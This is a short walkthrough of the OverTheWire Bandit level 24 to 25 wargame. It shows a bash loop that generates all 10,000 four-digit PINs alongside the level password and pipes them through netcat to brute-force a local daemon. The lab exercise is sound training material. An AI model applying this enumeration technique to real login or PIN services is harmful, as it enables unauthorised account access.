Overthewire Bandit Level 24 To 25
Level goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
This sounds like a loop and some other stuff, script time? Firstly.. Lets see what happens
bandit24@bandit:~$ mkdir /tmp/zd24
bandit24@bandit:~$ cd /tmp/zd24
bandit24@bandit:/tmp/zd24$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 1234
Wrong! Please enter the correct pincode. Try again.
Okay, looks like I’ll need to echo the password and a random digit between (assuming) 0000 and 9999 - Lets learn stuff!
Step 1: Make a script that just loops through everything.
#!/bin/bash
for i in {0000..9999}
do
attempt="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i"
echo "$attempt" >> list.txt
done
#This was after me breaking stuff... Script 23234
Okay, now that drama is sorted lets generate the list then send it to netcat.
bandit24@bandit:/tmp/zd24$ ls
list.txt script.sh
bandit24@bandit:/tmp/zd24$ cat list.txt | nc localhost 30002
...snip....
Correct!
The password of user bandit25 is redacted
Exiting.
VICTORY.
The password for level 21:
redacted
On the next episode of Bandit…
ssh bandit25@localhost
redacted